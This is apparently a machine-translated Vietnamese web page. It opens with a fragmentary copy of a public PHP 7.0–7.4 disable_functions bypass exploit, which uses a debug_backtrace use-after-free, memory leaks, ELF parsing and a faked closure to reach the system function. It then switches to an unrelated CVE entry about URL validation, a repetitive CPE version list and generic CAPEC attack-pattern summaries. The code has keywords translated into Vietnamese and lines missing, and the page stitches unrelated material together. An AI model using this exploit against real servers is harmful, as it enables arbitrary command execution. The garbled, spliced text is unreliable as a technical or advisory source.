Khai thác PHP 7.4 3

#PHP7. 0-7. 4 disable_functions bỏ qua PoC [chỉ dành cho *nix]

# Sâu bọ. https. // lỗi. php. mạng/lỗi. php?id=76047

# debug_backtrace[] trả về một tham chiếu đến một biến

# đã bị phá hủy, gây ra lỗ hổng UAF

# Khai thác này sẽ hoạt động trên tất cả PHP 7. 0-7. 4 phiên bản

# phát hành vào ngày 30/01/2020

# Tác giả. https. //github. com/mm0r1

toàn cầu $abc, $helper, $backtrace;

hàm công khai __destroy[] {

$backtrace = [Ngoại lệ mới]->getTrace[];

nếu[. isset[$backtrace[1]['args']]] { # PHP >= 7. 4

$backtrace = debug_backtrace[];

hàm str2ptr[&$str, $p = 0, $s = 8] {

địa chỉ $. = ord[$str[$p+$j]];

hàm ptr2str[$ptr, $m = 8] {

hàm ghi[&$str, $p, $v, $n = 8] {

$str[$p + $i] = chr[$v & 0xff];

rò rỉ hàm[$addr, $p = 0, $s = 8] {

ghi[$abc, 0x68, $addr + $p - 0x10];

$leak = strlen[$helper->a];

nếu[$s. = 8] { $rò rỉ %= 2 0 && $leak - $base < $data_addr - $base] {

# 'hằng số' kiểm tra liên tục

nếu[$deref. = 0x746e6174736e6f63]

$rò rỉ = rò rỉ[$data_addr, [$i + 4] * 8];

if[$leak - $base > 0 && $leak - $base < $data_addr - $base] {

# 'bin2hex' kiểm tra hằng số

nếu[$deref. = 0x786568326e6962]

hàm get_binary_base[$binary_leak] {

$start = $binary_leak & 0xffffffffffffff000;

for[$i = 0; $i < 0x1000; $i++] {

if[$leak == 0x10102464c457f] { # tiêu đề ELF

hàm get_system[$basic_funcs] {

$f_name = rò rỉ[$f_entry, 0, 6];

if[$f_name == 0x6d6574737973] { # hệ thống

hàm trigger_uaf[$arg] {

# str_shuffle ngăn quá trình thực tập chuỗi opcache

$arg = str_shuffle[str_repeat['A', 79]];

if[stristr[PHP_OS, 'WIN']] {

die['PoC này chỉ dành cho hệ thống *nix. '];

$n_alloc = 10;

for[$i = 0; $i < $n_alloc; $i++]

$contiguous[] = str_shuffle[str_repeat['A', 79]];

$abc = $backtrace[1]['args'][0];

$helper->b = function [$x] { };

nếu[strlen[$abc] == 79. strlen[$abc] == 0] {

$closure_handlers = str2ptr[$abc, 0];

$php_heap = str2ptr[$abc, 0x58];

$abc_addr = $php_heap - 0xc8;

ghi[$abc, 0x10, $abc_addr + 0x60];

$closure_obj = str2ptr[$abc, 0x20];

$binary_leak = rò rỉ[$closure_handlers, 8];

nếu[. [$base = get_binary_base[$binary_leak]]] {

die["Không thể xác định địa chỉ cơ sở nhị phân"];

nếu[. [$elf = parse_elf[$base]]] {

die["Không thể phân tích tiêu đề ELF"];

nếu[. [$basic_funcs = get_basic_funcs[$base, $elf]]] {

die["Không lấy được địa chỉ basic_functions"];

nếu[. [$zif_system = get_system[$basic_funcs]]] {

die["Không lấy được địa chỉ zif_system"];

for[$i = 0; $i < 0x110; $i += 8] {

write[$abc, $fake_obj_offset + $i, rò rỉ[$closure_obj, $i]];

write[$abc, 0x20, $abc_addr + $fake_obj_offset];

ghi[$abc, 0xd0 + 0x38, 1, 4];

ghi[$abc, 0xd0 + 0x68, $zif_system];

Tóm tắt Trong phiên bản PHP 7. 3. x dưới 7. 3. 26, 7. 4. x dưới 7. 4. 14 và 8. 0. 0, khi xác thực URL bằng các chức năng như filter_var[$url, FILTER_VALIDATE_URL], PHP sẽ chấp nhận URL có mật khẩu không hợp lệ làm URL hợp lệ. Điều này có thể dẫn đến các chức năng dựa vào URL hợp lệ để phân tích sai URL và tạo ra dữ liệu sai dưới dạng các thành phần của URL

Người giới thiệu

Cấu hình dễ bị tổn thương

  • cpe. 2. 3. a. php. php. 7. 3. 0. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. alpha1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. alpha1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. alpha2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. alpha2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. alpha3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. alpha3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. alpha4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. alpha4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. phiên bản beta3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc5. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc5. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 0. rc6. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 0. rc6. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 1. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 1. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 1. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 1. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 1. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 1. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 2. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 2. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 2. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 2. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 2. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 2. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 3. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 3. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 3. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 3. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 3. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 3. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 4. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 4. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 5. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 5. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 6. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 6. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 7. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 7. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 8. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 8. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 9. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 9. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 10. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 10. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 11. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 11. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 12. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 12. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 13. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 13. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 14. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 14. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 15. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 15. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 16. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 16. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 17. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 17. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 18. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 18. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 19. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 19. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 19. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 19. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 20. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 20. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 20. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 20. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 21. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 21. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 21. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 21. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 22. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 22. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 22. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 22. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 23. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 23. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 23. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 23. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 24. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 24. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 24. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 24. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 25. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 25. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 3. 25. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 3. 25. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. alpha1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. alpha1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. alpha2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. alpha2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. alpha3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. alpha3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. phiên bản beta1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. phiên bản beta1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. beta2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. beta2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. phiên bản beta4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. phiên bản beta4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc5. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc5. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 0. rc6. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 0. rc6. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 1. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 1. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 1. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 1. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 1. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 1. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 2. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 2. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 2. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 2. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 2. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 2. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 3. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 3. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 3. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 3. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 3. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 3. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 4. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 4. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 4. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 4. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 4. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 4. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 5. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 5. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 5. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 5. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 5. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 5. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 6. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 6. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 6. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 6. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 6. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 6. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 7. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 7. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 7. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 7. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 8. *. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 8. *. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 8. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 8. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 8. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 8. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 9. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 9. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 9. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 9. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 10. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 10. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 10. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 10. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 11. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 11. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 11. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 11. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 12. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 12. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 12. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 12. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 13. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 13. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 7. 4. 13. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 7. 4. 13. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. -. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. -. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. alpha1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. alpha1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. alpha2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. alpha2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. alpha3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. alpha3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. phiên bản beta3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. beta4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. beta4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. rc1. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. rc1. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. rc2. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. rc2. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. rc3. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. rc3. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. rc4. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. rc4. *. *. *. *. *. *

  • cpe. 2. 3. a. php. php. 8. 0. 0. rc5. *. *. *. *. *. *

    cpe. 2. 3. a. php. php. 8. 0. 0. rc5. *. *. *. *. *. *

  • cpe. 2. 3. o. debian. debian_linux. 9. 0. *. *. *. *. *. *. *

    cpe. 2. 3. o. debian. debian_linux. 9. 0. *. *. *. *. *. *. *

  • cpe. 2. 3. o. debian. debian_linux. 10. 0. *. *. *. *. *. *. *

    cpe. 2. 3. o. debian. debian_linux. 10. 0. *. *. *. *. *. *. *

  • cpe. 2. 3. a. ứng dụng mạng. clustered_data_ontap. -. *. *. *. *. *. *. *

    cpe. 2. 3. a. ứng dụng mạng. clustered_data_ontap. -. *. *. *. *. *. *. *

CVSSBase. 5. 0 [kể từ ngày 29-08-2022 - 20. 05]Tác động. Exploitability

CWE CWE-20

CAPEC

  • Tiêm SQL mù

    Blind SQL Injection results from an insufficient mitigation for SQL Injection. Mặc dù việc ngăn chặn các thông báo lỗi cơ sở dữ liệu được coi là phương pháp hay nhất, nhưng việc ngăn chặn một mình là không đủ để ngăn chặn SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Không có các thông báo lỗi tạo điều kiện cho SQL Injection, kẻ thù xây dựng các chuỗi đầu vào thăm dò mục tiêu thông qua các biểu thức SQL Boolean đơn giản. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Được áp dụng lặp đi lặp lại, kẻ thù xác định cách thức và vị trí mục tiêu dễ bị tấn công bởi SQL Injection

  • Overflow Variables and Tags

    Kiểu tấn công này tận dụng việc sử dụng các thẻ hoặc biến từ dữ liệu cấu hình được định dạng để gây tràn bộ đệm. Kẻ tấn công tạo một trang HTML độc hại hoặc tệp cấu hình bao gồm các chuỗi quá khổ, do đó gây tràn

  • Postfix, Null Terminate và Backslash

    Nếu một chuỗi được chuyển qua một loại bộ lọc nào đó, thì NULL đầu cuối có thể không hợp lệ. Sử dụng biểu diễn thay thế của NULL cho phép kẻ tấn công nhúng chuỗi giữa NULL trong khi hậu tố dữ liệu thích hợp để tránh bộ lọc. Một ví dụ là bộ lọc tìm ký tự dấu gạch chéo ở cuối. Nếu có thể chèn chuỗi, nhưng phải tồn tại dấu gạch chéo, thì có thể sử dụng mã hóa thay thế NULL ở giữa chuỗi

  • Giả mạo nhật ký web

    Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Ngoài ra, việc ghi dữ liệu độc hại vào tệp nhật ký có thể nhắm mục tiêu vào các công việc, bộ lọc, báo cáo và các tác nhân khác xử lý nhật ký theo kiểu tấn công không đồng bộ. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application

  • Signature Spoof

    Kẻ tấn công tạo một thông báo hoặc khối dữ liệu khiến người nhận tin rằng thông báo hoặc khối dữ liệu đã được tạo và ký bằng mật mã bởi một nguồn có thẩm quyền hoặc có uy tín, đánh lừa nạn nhân hoặc hệ điều hành của nạn nhân thực hiện các hành động nguy hiểm

  • Sử dụng mã hóa Unicode để bỏ qua logic xác thực

    Kẻ tấn công có thể cung cấp một chuỗi Unicode cho một thành phần hệ thống không biết Unicode và sử dụng chuỗi đó để phá vỡ bộ lọc hoặc khiến cơ chế phân loại không hiểu đúng yêu cầu. Điều đó có thể cho phép kẻ tấn công trượt dữ liệu độc hại qua bộ lọc nội dung và/hoặc có thể khiến ứng dụng định tuyến yêu cầu không chính xác

  • Tiêm lệnh hệ điều hành

    In this type of an attack, an adversary injects operating system commands into existing application functions. Một ứng dụng sử dụng đầu vào không đáng tin cậy để xây dựng chuỗi lệnh dễ bị tấn công. Kẻ thù có thể tận dụng tính năng chèn lệnh của hệ điều hành trong một ứng dụng để nâng cao đặc quyền, thực thi các lệnh tùy ý và xâm phạm hệ điều hành cơ bản

  • Buffer Overflow in an API Call

    This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. Kẻ tấn công có quyền truy cập vào API có thể cố gắng nhúng mã độc vào lệnh gọi hàm API và khai thác lỗ hổng tràn bộ đệm trong quá trình triển khai hàm. All clients that make use of the code library thus become vulnerable by association. Điều này có ảnh hưởng rất lớn đến bảo mật trên toàn hệ thống, thường ảnh hưởng đến nhiều quy trình phần mềm

  • XSS Using MIME Type Mismatch

    An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser

  • tiêm XPath

    Kẻ tấn công có thể tạo đầu vào đặc biệt do người dùng kiểm soát bao gồm các biểu thức XPath để đưa vào cơ sở dữ liệu XML và bỏ qua xác thực hoặc thu thập thông tin mà thông thường anh ta không thể có được. XPath Injection cho phép kẻ tấn công nói chuyện trực tiếp với cơ sở dữ liệu XML, do đó bỏ qua ứng dụng hoàn toàn. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database

  • Using Slashes and URL Encoding Combined to Bypass Validation Logic

    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. Một URL có thể chứa ký tự đặc biệt cần xử lý cú pháp đặc biệt để được diễn giải. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character [%HEX-CODE]. For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc

  • Nhúng byte NULL

    Kẻ tấn công nhúng một hoặc nhiều byte rỗng vào đầu vào của phần mềm đích. This attack relies on the usage of a null-valued byte as a string terminator in many environments. Mục tiêu là để các thành phần nhất định của phần mềm đích ngừng xử lý đầu vào khi nó gặp [các] byte rỗng

  • Tràn định dạng chuỗi trong syslog[]

    Cuộc tấn công này nhắm vào các lỗ hổng chuỗi định dạng trong hàm syslog[]. An attacker would typically inject malicious input in the format string parameter of the syslog function. Đây là một vấn đề phổ biến và nhiều lỗ hổng công khai cũng như các khai thác liên quan đã được đăng

  • Using Escaped Slashes in Alternate Encoding

    Cuộc tấn công này nhắm vào việc sử dụng dấu gạch chéo ngược trong mã hóa thay thế. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack

  • Buffer Overflow via Environment Variables

    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables

  • Cross Zone Scripting

